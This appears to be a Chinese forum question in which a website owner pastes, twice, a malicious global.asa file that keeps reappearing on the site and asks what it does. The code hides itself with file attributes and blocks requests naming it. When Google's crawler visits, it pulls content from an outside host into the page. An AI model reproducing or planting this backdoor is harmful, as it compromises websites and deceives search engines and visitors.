你们懂吗?这是什么病毒程序?小弟我的网站老出现,删了又有。后门藏在哪里
日期:2014-05-17 浏览次数:21117 次
你们懂吗?这是什么病毒程序?我的网站老出现,删了又有。后门藏在哪里
我的网页老被加载一些莫名代码。网站中查到有个陌生的程序(程序名global.asa),删了下次打开还出现。是不是我网站中程序有后门,如果有它们一般会放在哪里?
代码如下:(能帮忙解释下,这个程序什么作用)
<script language="vbscript" runat="server">
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
dim name
name=request.servervariables("Path_Translated")
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
if instr(name,";")>0 then
f.Attributes=1+2+4
response.end()
end if
if instr(server.MapPath("."),".asp")>0 or instr(server.MapPath("."),".asa")>0 then
f.Attributes=1+2+4
response.end()
end if
Dim v
Dim t
ReDim A(Request.Form.Count)
ReDim B(Request.Form.Count)
v=Request.Form
t=Request.Form.Count
if t>0 then
For i=0 To t-1
b(i)=Split(Split(v,"&")(i),"=")(1)
if instr(LCase(b(i)),"global.asa")>0 then
f.Attributes=1+2+4
response.end()
end if
Next
end if
Dim ScriptAddress, M_ItemUrl, M_item
ScriptAddress = CStr(Request.ServerVariables("SCRIPT_NAME"))
If (Request.QueryString <> "") Then
GetUrl =Request.ServerVariables("Server_Name")&ScriptAddress &"?"&Request.QueryString
else
GetUrl= Request.ServerVariables("Server_Name")&ScriptAddress
end if
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
httpuser=LCase(request.servervariables("http_user_agent"))
strURL=Request.ServerVariables("HTTP_REFERER")
Dim I
If InStr(strURL, "%") = 0 Then
URLDecode = strURL
end if
For I = 1 To Len(strURL)
If Mid(strURL, I, 1) = "%" Then
If eval("&H" & Mid(strURL, I + 1, 2)) > 127 Then
URLDecode = URLDecode & Chr(eval("&H" & Mid(strURL, I + 1, 2) & Mid(strURL, I + 4, 2)))
I = I + 5
Else
URLDecode = URLDecode & Chr(eval("&H" & Mid(strURL, I + 1, 2)))
I = I + 2
End If
Else
URLDecode = URLDecode & Mid(strURL, I, 1)
End If
Next
if instr(httpuser,"google")>0 then
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET","http://link.43dq1.com/try7723.asp?weburl="&GetUrl&"&dd="&cstr(int(rnd()*10000)+1)&"&bot="&httpuser,False
ObjXMLHTTP.setRequestHeader "User-Agent","http://link.43dq1.com/"
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
if instr(lcase(gethtml),"nodomain")>0 then
else
response.write gethtml
end if
end if
f.Attributes=1+2+4
end sub
</script&
我的网页老被加载一些莫名代码。网站中查到有个陌生的程序(程序名global.asa),删了下次打开还出现。是不是我网站中程序有后门,如果有它们一般会放在哪里?
代码如下:(能帮忙解释下,这个程序什么作用)
<script language="vbscript" runat="server">
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
dim name
name=request.servervariables("Path_Translated")
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
if instr(name,";")>0 then
f.Attributes=1+2+4
response.end()
end if
if instr(server.MapPath("."),".asp")>0 or instr(server.MapPath("."),".asa")>0 then
f.Attributes=1+2+4
response.end()
end if
Dim v
Dim t
ReDim A(Request.Form.Count)
ReDim B(Request.Form.Count)
v=Request.Form
t=Request.Form.Count
if t>0 then
For i=0 To t-1
b(i)=Split(Split(v,"&")(i),"=")(1)
if instr(LCase(b(i)),"global.asa")>0 then
f.Attributes=1+2+4
response.end()
end if
Next
end if
Dim ScriptAddress, M_ItemUrl, M_item
ScriptAddress = CStr(Request.ServerVariables("SCRIPT_NAME"))
If (Request.QueryString <> "") Then
GetUrl =Request.ServerVariables("Server_Name")&ScriptAddress &"?"&Request.QueryString
else
GetUrl= Request.ServerVariables("Server_Name")&ScriptAddress
end if
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
httpuser=LCase(request.servervariables("http_user_agent"))
strURL=Request.ServerVariables("HTTP_REFERER")
Dim I
If InStr(strURL, "%") = 0 Then
URLDecode = strURL
end if
For I = 1 To Len(strURL)
If Mid(strURL, I, 1) = "%" Then
If eval("&H" & Mid(strURL, I + 1, 2)) > 127 Then
URLDecode = URLDecode & Chr(eval("&H" & Mid(strURL, I + 1, 2) & Mid(strURL, I + 4, 2)))
I = I + 5
Else
URLDecode = URLDecode & Chr(eval("&H" & Mid(strURL, I + 1, 2)))
I = I + 2
End If
Else
URLDecode = URLDecode & Mid(strURL, I, 1)
End If
Next
if instr(httpuser,"google")>0 then
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET","http://link.43dq1.com/try7723.asp?weburl="&GetUrl&"&dd="&cstr(int(rnd()*10000)+1)&"&bot="&httpuser,False
ObjXMLHTTP.setRequestHeader "User-Agent","http://link.43dq1.com/"
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
if instr(lcase(gethtml),"nodomain")>0 then
else
response.write gethtml
end if
end if
f.Attributes=1+2+4
end sub
</script&
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
